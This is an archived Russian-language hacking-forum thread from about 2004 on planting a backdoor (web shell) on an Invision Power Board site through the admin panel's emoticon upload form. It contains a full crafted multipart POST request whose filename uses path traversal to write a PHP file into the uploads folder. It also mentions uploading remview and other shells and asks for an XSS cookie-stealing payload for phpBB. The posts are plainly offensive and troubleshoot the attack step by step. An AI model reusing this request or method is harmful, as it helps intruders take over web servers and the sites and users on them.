Просмотр полной версии : Как можно залить бэкдор на сервер,если есть доступ в админку форума на Invision Power
Как можно залить бэкдор на сервер,если есть доступ в админку форума на Invision Power Board ???
На сайте www.antichat.ru/txt/IPB/index2.php - Algol рассказывает как можно это сделать через меню Manage emoticons. Внизу мы видим форму для отправки смайликов на сервер. Защиты на тип файлов для смайликов, в IPB не предусмотрено, поэтому без труда можно залить файл произвольного типа. Однако иногда это не выходит http://forum.antichat.ru/iB_html/non-cgi/emoticons/sad.gif !!! И вот я хочу спросить не знает ли еще кто-нибудь о другом способе заливки бэкдора !!!
P.S заранее спасибо !!!
Что значит "не выходит"??
Опиши нормально проблему.
Проблема в том,что чтобы я не пытался загрузить через upload- всё пишет неудачная загрузка !!!
Кстати Algol не подскажешь еще пример межсайтового скриптинга для похищения кукисов с phpbb 2.0.8
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Guest @ июля 01 2004,17:25)</td></tr><tr><td id="QUOTE">Проблема в том,что чтобы я не пытался загрузить через upload- всё пишет неудачная загрузка !!![/QUOTE]<span id='postcolor'>
Кто пишет?
В какой ситуации пишет ??
Смайлики загружаются хоть куда нибудь?
Автаоры в upload загружаются ?
(И кстати в статье фокус со смйлами описан для примера, а вообще-то можно попробовать и через что-то другое заливать)
PS
Насчет phpBB - пока за него не брались, поэтому ничего сказать не могу.. Если найдешь что нить - черкани ...
Объясняю подробно и понятно !!! Захожу я в админку выбираю меню загрузки смайликов,пытаюсь загрузить remview и другие шеллы,нажимаю кнопку загрузить и через несколько секунд появляется страница с надписью неудачная загрузка !!! Причём не загружаются даже смайлики,которые в принципе должны закружаться http://forum.antichat.ru/iB_html/non-cgi/emoticons/mad.gif
Ну правильно. В директорию смайлов запись закрыта. Но в upload то должно загружаться
По пробовал залить в upload,для этого воспользовался твоей статьей захват сайтов и примером модифицированного запроса:
POST http://someSiteForum/admin.php?adsess=7456d367b18da87d161f59424a4e96f7 HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://someSiteForum/admin.p....ode=emo (http://someSiteForum/admin.php?adsess=7456d367b18da87d161f59424a4e96f7&act=op&code=emo)
Accept-Language: ru
Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 677
Pragma: no-cache
Cookie: member_id=1; pass_hash=cf20fc37b4g0be45c1336f29d444e798;
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="adsess"
7456d367b18da87d161f59424a4e96f7
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="code"
emo_upload
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="act"
op
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"
10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../uploads/myFile.php"
Content-Type: application/octet-stream
<% echo("Hello from injected PHP script") %>
-----------------------------7d43942c405bc--
Ну естественно название сайта и хэш сменил, но после отправки если нажать кнопку show body in browser то открывается окно и просят ввести пароль для входа в админку !!! Я не знаю почему так получается ведь хэш то правильный у меня указан !!! И еще вот эта строчка
<% echo("Hello from injected PHP script") %>
-----------------------------7d43942c405bc--
зачем нужна можешь пояснить ???
Помимо адреса и хеша, нужно еще заменить номер сессии adsess=7456d367b18da87d161f59424a4e96f7
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE"><% echo("Hello from injected PHP script") %>
-----------------------------7d43942c405bc--
зачем нужна можешь пояснить ???[/QUOTE]<span id='postcolor'>
Вообще-то это внедряемый пхп-скрипт http://forum.antichat.ru/iB_html/non-cgi/emoticons/cool.gif
Всё изменил как надо,только теперь в твоей проге сразу открывается окно с надписью неудачная загрузка !!!
И даже не предлагают ничего загрузить http://forum.antichat.ru/iB_html/non-cgi/emoticons/confused.gif вот в этом теперь и проблема !!!
Еще раз спрашиваю: аватары в форуме загрузить можно ???
Если можно, значит uploads открыта на запись, а значит загрузка должна работать. Если не работает, значит ты где-то что-то неправильно делаешь ...
Я просто немного недопонимаю как ты заливаешь бэкдор в другую папку !!!
Насколько я понял ты модифицируешь запрос с помощью inetcrack, затем нажимаешь show body in browser и у тебя открывается страница загрузки,там ты нажимаешь обзор выбираешь файло с твоего харда или еще чего нибудь и нажимаешь загрузить !!! Только вот не понятно как ты узнаешь потом что бэкдор залит, или там после заливки что-то пишется дальше ?!!
Ты видимо действительно ничего не понял .....
Читай основы HTTP http://antichat.ru/crackchat/HTTP/http.html
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot